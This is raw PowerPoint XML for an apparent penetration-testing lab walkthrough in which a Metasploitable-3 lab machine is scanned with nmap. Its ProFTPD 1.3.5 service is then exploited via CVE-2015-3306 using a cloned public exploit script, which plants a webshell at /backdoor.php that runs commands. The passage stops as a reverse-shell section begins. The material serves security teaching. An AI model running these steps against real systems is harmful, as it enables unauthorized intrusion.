            <a:chOff x="-26" y="2093276"/>
            <a:chExt cx="9151695" cy="2645587"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369DD569-D054-ABEA-4EBD-D4A8A68586D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="4838" t="6194" r="11032" b="3704"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1001063" y="3803073"/>
              <a:ext cx="1310665" cy="935790"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F060482-BCB1-FF4F-FA36-C20C8AE64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377" y="3105090"/>
              <a:ext cx="948264" cy="895874"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A2BB18-8934-137F-0A70-22D847B72C6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect b="25140"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3768436" y="2093276"/>
              <a:ext cx="1114048" cy="891714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Elbow Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18BE167-796D-94E1-3E00-BCFB4B727A2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2311728" y="2837851"/>
              <a:ext cx="1546763" cy="965222"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">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21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96E6A43-0288-A913-3721-F9EFAFCC6EF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4821382" y="2837851"/>
              <a:ext cx="2479963" cy="570367"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">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AC4F9AE-F159-905F-BED1-7806B39449CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-26" y="4060733"/>
              <a:ext cx="1104826" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Attacker’s</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Machine </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" cap="none" spc="0" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="6E747A">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBBC4B0A-50A1-D9F7-F152-F9BFF4EB2BC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7381870" y="2267944"/>
              <a:ext cx="1769799" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Vulnerable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Metasploitable-3 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" cap="none" spc="0" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Win-2008R2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378486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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First thing first we need to scan the target host, here we are trying to detect service version with all port, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –p- 192.168.31.30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E5A42E-62DB-17CE-B9A0-AED8C4477709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075309" y="3116342"/>
            <a:ext cx="8397968" cy="2751058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4040822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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Vulnerability Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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295400" y="1576989"/>
            <a:ext cx="9601200" cy="4242786"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We observe that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1.3.5 is installed on target host and by vulnerability analysis using google search we can find that is version is vulnerable to RCE. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/t0kx/exploit-CVE-2015-3306</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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6BF0ECFA-013E-67D7-408F-3F5AD5485A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1721437" y="2384345"/>
            <a:ext cx="8504657" cy="2484335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2010805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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploit preparation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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295400" y="1576989"/>
            <a:ext cx="9601200" cy="4242786"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We have search in google and find several sites and found a script/exploit for this vuln., we have download the python file of this exploit from following website -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/t0kx/exploit-CVE-2015-3306</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/t0kx/exploit-CVE-2015-3306.git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304074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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Gaining Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>System hacking is defined as the compromise of computer systems and software to access the target computer and steal or misuse their sensitive information. Here the malicious hacker exploits the weaknesses in a computer system or network to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>gain unauthorized access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to its data or take illegal advantage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Gaining Access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Here the hacker uses different techniques and tools to gain maximum data from the system. They are – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Password Attacks – Sniffing, Trojan, Key logger, Spyware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Password Cracking – Brute force, Dictionary Attack, Rule based attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Vulnerability Exploitation – Exploit vulnerable services, backdated software, Misconfiguration etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="824236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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploitation Phase</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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295400" y="1576989"/>
            <a:ext cx="9601200" cy="4242786"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After download the exploit, follow the steps to exploit the machine – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go the folder of exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>./exploit.py --host 192.168.31.30 --port 21 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> "/var/www/html“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After that we can see a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is created at /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>backdoor.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> location </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to the page - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.31.30/backdoor.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute command by following</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.31.30/backdoor.php?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199652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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Getting Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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295400" y="1576988"/>
            <a:ext cx="10281082" cy="4983609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To get a reverse shell we can use various techniques, here I am using </a:t>
            </a:r>
            <a:r>
